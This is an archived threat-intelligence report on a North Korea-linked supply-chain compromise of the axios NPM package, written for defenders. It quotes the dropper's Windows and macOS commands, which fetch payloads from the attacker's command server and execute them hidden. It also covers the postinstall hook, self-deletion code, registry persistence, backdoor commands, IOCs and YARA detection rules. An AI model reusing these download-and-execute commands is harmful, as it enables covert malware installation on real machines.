{
	"id": "059edf69-92de-4303-a1b6-50a66b8a487e",
	"created_at": "2026-04-06T00:06:31.768392Z",
	"updated_at": "2026-04-10T03:37:58.945081Z",
	"deleted_at": null,
	"sha1_hash": "4d121bcd6d12a8de873f9b4d1819ae1253614445",
	"title": "North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 114005,
	"plain_text": "North Korea-Nexus Threat Actor Compromises Widely Used Axios\r\nNPM Package in Supply Chain Attack\r\nBy Google Threat Intelligence Group, Mandiant\r\nPublished: 2026-03-31 · Archived: 2026-04-05 17:57:38 UTC\r\nWritten by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya,\r\nMichael Rudden, Mon Liclican\r\nIntroduction \r\nGoogle Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular\r\nNode Package Manager (NPM) package \"axios.\" Between March 31, 2026, 00:21 and 03:20 UTC, an attacker\r\nintroduced a malicious dependency named \" plain-crypto-js \" into axios NPM releases versions 1.14.1 and\r\n0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically\r\nhave over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an\r\nobfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.\r\nGTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since at\r\nleast 2018, based on the use of WAVESHAPER.V2, an updated version of WAVESHAPER previously used by\r\nthis threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure\r\nused by UNC1069 in past activities.\r\nThis blog details the attack lifecycle, from the initial account compromise to the deployment of operating system\r\n(OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat.\r\nCampaign Overview\r\nOn March 31, 2026, GTIG observed the introduction of plain-crypto-js version 4.2.1 as a dependency in the\r\nlegitimate axios package version 1.14.1. Analysis indicates the maintainer account associated with the axios\r\npackage was compromised, with the associated email address changed to an attacker-controlled account\r\n( ifstap@proton.me ).\r\nThe threat actor used the postinstall hook within the \" package.json\" file of the malicious dependency to\r\nachieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an\r\nobfuscated JavaScript dropper named \" setup.js\" in the background.\r\n \"scripts\": {\r\n \"test\": \"echo \\\"Error: no test specified\\\" \u0026\u0026 exit 1\",\r\n \"postinstall\": \"node setup.js\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 1 of 9\n\n}\r\nMalware Analysis \r\nThe plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL,\r\nsetup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 ), dynamically\r\nchecks the target system's operating system upon execution to deliver platform-specific payloads.\r\nThe script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control\r\n(C2 or C\u0026C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs , os ,\r\nand execSync . After successfully dropping the secondary payload, setup.js attempts to delete itself and revert\r\nthe modified package.json to hide forensic traces of the postinstall hook.\r\nOperating System-Specific Execution Paths\r\nDepending on the identified platform, the dropper executes the following routines.\r\nWindows\r\nThe dropper actively hunts for the native powershell.exe binary. To evade detection, it copies the legitimate\r\nexecutable to %PROGRAMDATA%\\wt.exe . It then downloads a PowerShell script via curl using the POST body\r\npackages.npm.org/product1 and saves it to the user's AppData Temp directory (e.g., %TEMP%\\6202033.ps1 ).\r\nThe payload is executed using a copied Windows Terminal executable with hidden and execution policy bypass\r\nflags.\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nobjShell.Run \"cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 \u003e %TEMP%\r\n \u0026 %PROGRAMDATA%\\wt.exe -w hidden -ep bypass -file %TEMP%\\6202033.ps1 http://sfrclak\r\nmacOS\r\nThe malware uses bash and curl to download a native Mach-O binary payload to\r\n/Library/Caches/com.apple.act.mond using the POST body packages.npm.org/product0 . It modifies\r\npermissions to make the file executable and launches it via zsh in the background.\r\ntry\r\n do shell script \"\r\n curl -o /Library/Caches/com.apple.act.mond\r\n -d packages.npm.org/product0\r\n-s http://sfrclak.com:8000/6202033\r\n \u0026\u0026 chmod 770 /Library/Caches/com.apple.act.mond\r\n \u0026\u0026 /bin/zsh -c \"/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 \u0026\"\r\n \u0026\u003e /dev/null\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 2 of 9\n\n\"\r\n end try\r\n do shell script \"rm -rf tmp/6202033\"\r\nLinux\r\nThe script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2 .\r\nCleanup \r\nAside from removing downloaded scripts in two execution branches, the script attempts to remove itself and\r\nreplace an injected package.json with an original one, which was stored as \" package.md \".\r\nconst K = __filename;\r\nt.unlink(K, (x =\u003e {}))\r\nt.unlink('package.json', (x =\u003e {})), t.rename('package.md', 'package.json', ord)\r\nWAVESHAPER.V2 Backdoor Capabilities\r\nThe platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2,\r\na backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute\r\nadditional payloads and that connects to the C2 provided via command-line arguments. Notably, GTIG identified\r\nadditional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments.\r\nRegardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second\r\nintervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent: \r\nmozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\r\nFollowing the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing\r\nfor 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The\r\nbackdoor supports multiple commands outlined in the Table 1.\r\nCommand Description\r\nkill Terminates the malware's execution process.\r\nrundir\r\nRetrieves detailed directory listings, including file paths, sizes, and creation/modification\r\ntimestamps for paths specified in the ReqPaths parameter.\r\nrunscript Decodes and executes a provided AppleScript payload.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 3 of 9\n\nCommand Description\r\npeinject\r\nDecodes, drops, ad-hoc signs, and executes an arbitrary binary payload with optional\r\nparameters.\r\nTable 1: WAVESHAPER.V2 commands\r\nOn Windows, persistence is achieved by creating a hidden batch file ( %PROGRAMDATA%\\system.bat ) and adding a\r\nnew entry named MicrosoftUpdate to HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run to launch it at\r\nlogon.\r\nWAVESHAPER.V2 acts as a fully functional RAT with the following capabilities:\r\nReconnaissance: Extracts system telemetry, including hostname, username, boot time, time zone, OS\r\nversion, and detailed running process lists.\r\nCommand Execution: Supports multiple execution methods, including in-memory Portable Executable\r\n(PE) injection and arbitrary shell commands. The shell execution command expects a script and script\r\nparameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a\r\nscript is provided, it is either Base64-encoded or placed into a file depending on its size.\r\nFile System Enumeration: Returns detailed metadata for requested target directories by continuously\r\nrecursing through the file system.\r\nAttribution\r\nGTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since\r\n2018. Analysis of the C2 infrastructure ( sfrclak[.]com resolving to 142.11.206.73 ) revealed connections\r\nfrom a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the\r\nsame ASN has been historically linked to UNC1069 operations.\r\nFurthermore, WAVESHAPER.V2 is a direct evolution of WAVESHAPER, a macOS and Linux backdoor\r\npreviously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol\r\nand employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system\r\ninformation, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL\r\ndynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent\r\nstring, and deploy secondary payloads to identical temporary directories (e.g.,\r\n/Library/Caches/com.apple.act.mond ).\r\nOutlook and Implications\r\nThe impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages\r\nrely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 4 of 9\n\nsource supply chain attacks in recent weeks. UNC6780 (also known as TeamPCP) recently poisoned GitHub\r\nActions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the\r\nSANDCLOCK credential stealer and facilitate follow-on extortion operations. \r\nHundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This\r\ncould enable further software supply chain attacks, software as a service (SaaS) environment compromises\r\n(leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over\r\nthe near term. \r\nSupply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and\r\nenterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the\r\ntrust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close\r\nattention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact,\r\nremediate compromised systems, and harden environments against future attacks.\r\nRemediation \r\nGTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority\r\nshould be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any\r\npotentially exposed secrets or credentials. Following initial containment, organizations must implement long-term\r\nhardening through strict version pinning and enhanced supply-chain monitoring.\r\nVersion Control: Do not upgrade to axios version 1.14.1 or 0.30.4. Ensure corporate-managed NPM\r\nrepositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier).\r\nDependency Pinning: Pin axios to a known safe version in your package-lock.json to prevent\r\naccidental upgrades.\r\nMalicious Package Audit: Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions\r\n4.2.0 or 4.2.1). Use tools like Wiz or Open Source Insights for deeper dependency auditing.\r\nPipeline Security: Pause CI/CD deployments for any package relying on axios. Validate that builds are not\r\npulling \"latest\" versions before redeploying with pinned, safe versions. \r\nIncident Response: If plain-crypto-js is detected, assume the host environment is compromised.\r\nRevert the environment to a known-good state and rotate all credentials or secrets present on that machine.\r\nNetwork Defense: Block all traffic to sfrclak[.]com and the command \u0026 control IP: 142.11.206.73.\r\nMonitor and alert on any endpoint communication attempts to this domain.\r\nCache Remediation: Clear local and shared npm, yarn, and pnpm caches on all workstations and build\r\nservers to prevent re-infection during subsequent installs.\r\nEndpoint Protection: Deploy EDR to protect developer environments. Monitor for suspicious processes\r\nspawning from Node.js applications that match known Indicators of Compromise (IOCs).\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 5 of 9\n\nCredential Management: Rotate all tokens and API keys used by applications confirmed to have run\r\nindicators of compromise (IOCs).\r\nDeveloper Sandboxing \u0026 Secret Vaulting: Isolate development environments in containers or sandboxes\r\nto restrict host filesystem access, and migrate plaintext secrets to the OS keychain using aws-vault. This\r\nensures compromised packages cannot programmatically scrape credentials or execute malicious scripts\r\ndirectly on the host machine.\r\nIndicators of Compromise (IOCs) \r\nTo assist the wider community in hunting and identifying the activity outlined in this blog post, we have included\r\nIOCs in a free GTI Collection for registered users.\r\nNetwork Indicators\r\nIndicator Type  Notes \r\n142.11.206.73 C2 WAVESHAPER.V2\r\nsfrclak[.]com C2 WAVESHAPER.V2\r\nhttp://sfrclak[.]com:8000 C2 WAVESHAPER.V2\r\nhttp://sfrclak[.]com:8000/6202033 C2 WAVESHAPER.V2\r\n23.254.167.216 C2 Suspected UNC1069 Infrastructure\r\nFile Indicators\r\nFamily Notes SHA256\r\nWAVESHAPER.V2\r\nLinux\r\nPython\r\nRAT\r\nfcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 6 of 9\n\nWAVESHAPER.V2\r\nmacOS\r\nNative\r\nBinary\r\n92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a\r\nWAVESHAPER.V2\r\nWindows\r\nStage 1\r\n617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101\r\nWAVESHAPER.V2 N/A  ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c\r\nSILKBELL N/A  e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09\r\nN/A  system.bat f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd\r\nN/A \r\nplain-crypto-js-4.2.1.tgz\r\n58401c195fe0a6204b42f5f90995ece5fab74ce7c69c67a24c61a057325af668\r\nYARA Rules\r\nThese rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts\r\nfor retrospective hunting and validation.\r\nrule G_Backdoor_WAVESHAPER.V2_PS_1\r\n{\r\n meta:\r\n description = \"Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encod\r\n author = \"GTIG\"\r\n md5 = \"04e3073b3cd5c5bfcde6f575ecf6e8c1\"\r\n date_created = \"2026/03/31\"\r\n date_modified = \"2026/03/31\"\r\n rev = 1\r\n platforms = \"Windows\"\r\n family = \"WAVESHAPER.V2\"\r\n strings:\r\n $ss1 = \"packages.npm.org/product1\" ascii wide nocase\r\n $ss2 = \"Extension.SubRoutine\" ascii wide nocase\r\n $ss3 = \"rsp_peinject\" ascii wide nocase\r\n $ss4 = \"rsp_runscript\" ascii wide nocase\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 7 of 9\n\n$ss5 = \"rsp_rundir\" ascii wide nocase\r\n $ss6 = \"Init-Dir-Info\" ascii wide nocase\r\n $ss7 = \"Do-Action-Ijt\" ascii wide nocase\r\n $ss8 = \"Do-Action-Scpt\" ascii wide nocase\r\n condition:\r\n uint16(0) != 0x5A4D and filesize \u003c 100KB and 5 of ($ss*)\r\n}\r\nrule G_Hunting_Downloader_suspected_UNC1069_PS_1\r\n{\r\n meta:\r\n description = \"Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply\r\n author = \"GTIG\"\r\n md5 = \"089e2872016f75a5223b5e02c184dfec\"\r\n date_created = \"2026/03/31\"\r\n date_modified = \"2026/03/31\"\r\n rev = 1\r\n platforms = \"Windows\"\r\n strings:\r\n $ss1 = \"start /min powershell -w h\" ascii wide nocase\r\n $ss2 = \"[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString\" ascii wide nocase\r\n $ss3 = \"Invoke-WebRequest -UseBasicParsing\" ascii wide nocase\r\n $ss4 = \"-Method POST -Body\" ascii wide nocase\r\n $ss5 = \"packages.npm.org/product1\" ascii wide nocase\r\n condition:\r\n uint16(0) != 0x5A4D and filesize \u003c 5KB and all of them\r\n}\r\nrule G_Hunting_Downloader_SILKBELL_1\r\n{\r\n meta:\r\n description = \"Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfusca\r\n author = \"GTIG\"\r\n md5 = \"7658962ae060a222c0058cd4e979bfa1\"\r\n date_created = \"2026/03/31\"\r\n date_modified = \"2026/03/31\"\r\n rev = 1\r\n platforms = \"Any\"\r\n strings:\r\n $ss1 = \"OrDeR_7077\" ascii wide fullword\r\n $ss2 = \"String.fromCharCode(S^a^333)\" ascii wide\r\n $ss3 = \"\\\"TE9DQUw^\\\".replaceAll(\\\"^\\\",\\\"=\\\")\" ascii wide\r\n $ss4 = \"\\\"UFM_\\\".replaceAll(\\\"_\\\",\\\"=\\\")\" ascii wide\r\n $ss5 = \"\\\"U0NSXw--\\\".replaceAll(\\\"-\\\",\\\"=\\\")\" ascii wide\r\n $ss6 = \"\\\"UFNfQg--\\\".replaceAll(\\\"-\\\",\\\"=\\\")\" ascii wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 8 of 9\n\n$ss7 = \"\\\"d2hlcmUgcG93ZXJzaGVsbA((\\\".replaceAll(\\\"(\\\",\\\"=\\\")\" ascii wide\r\n condition:\r\n uint16(0) != 0x5A4D and filesize \u003c 100KB and all of them\r\n}\r\nGoogle Security Operations (SecOps)\r\nGoogle Security Operations (SecOps) customers have access to the following broad category rules and more\r\nunder the Mandiant Intel Emerging Threats rule pack.\r\nCurl Writing Apple System File to Staging Directory\r\nNode Spawning Nohup Osascript\r\nNode Spawning Windows Script Host With Delete Command\r\nWindows Script Host Spawning Shell With Curl\r\nWindows Terminal In Suspicious Staging Directory\r\nWiz\r\nWiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are\r\nimpacted. For more information refer to Wiz’s blog post, Axios NPM Distribution Compromised in Supply Chain\r\nAttack.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package"
	],
	"report_names": [
		"north-korea-threat-actor-targets-axios-npm-package"
	],
	"threat_actors": [
		{
			"id": "dcbff54d-13ec-40b5-b3b9-b74a315669e1",
			"created_at": "2026-02-03T02:00:03.428641Z",
			"updated_at": "2026-04-10T02:00:03.937539Z",
			"deleted_at": null,
			"main_name": "UNC1069",
			"aliases": [
				"MASAN",
				"CryptoCore"
			],
			"source_name": "MISPGALAXY:UNC1069",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63883709-27b5-4b65-9aac-c782780fbb28",
			"created_at": "2026-04-10T02:00:03.996704Z",
			"updated_at": "2026-04-10T02:00:03.996704Z",
			"deleted_at": null,
			"main_name": "TeamPCP",
			"aliases": [],
			"source_name": "MISPGALAXY:TeamPCP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433991,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d121bcd6d12a8de873f9b4d1819ae1253614445.pdf",
		"text": "https://archive.orkl.eu/4d121bcd6d12a8de873f9b4d1819ae1253614445.txt",
		"img": "https://archive.orkl.eu/4d121bcd6d12a8de873f9b4d1819ae1253614445.jpg"
	}
}